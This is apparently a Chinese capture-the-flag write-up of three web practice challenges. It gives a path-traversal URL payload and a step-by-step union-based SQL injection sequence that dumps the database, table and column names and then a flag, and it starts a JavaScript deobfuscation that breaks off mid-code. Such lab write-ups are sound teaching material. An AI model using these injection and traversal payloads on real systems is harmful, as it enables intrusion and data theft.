攻防世界web练习
十八、warmup
http://111.200.241.244:62181/
解题思路:
- 进入题目,只有一张图片,查看源代码,发现文件——source.php
- 查看source.php,分析代码发现新文件——hint.php
- 查看hint.php,提示flag所在的路径为“ffffllllaaaagggg”
- 随即构造payload:http://111.200.241.244:62181/source.php?file=hint.php?/…/…/…/…/…/…/ffffllllaaaagggg
考察代码审计能力
标题十九、NewsCenter
http://111.200.241.244:64458/
- 进入后,发现有一个搜索框进行新闻搜索,尝试有无sql注入
输入1’ and 1=1 # 判断有无sql注入,发现有sql注入 - 查看列数1’order by 3 #
- 首先去爆库:
1’ union select 1,2,database() # - 库是news,继续爆表:
1’ union select 1,2,table_name from information_schema.tables where table_schema=‘news’ # - 看到一个secret_table,爆他的列:
1’ union select 1,2,column_name from information_schema.columns
where table_name=‘secret_table’ # - 执行查询语句:
1’ union select 1,id,fl4g from secret_table #
考察手工SQL注入
二十、NaNNaNNaNNaN-Batman
原理:javascript的代码审计、正则表达式
-
下载附件,解压,在文件后加上后缀名.html,用浏览器访问,发现是个提交框
-
用Sublime Text(记事本都行)打开文件发现是一段javascript代码,并且包含大量控制字符
-
复制原文件,进入副本,将eval改成alert
-
浏览器访问副本,得到没有乱码的代码
funcyion $() { var e = document<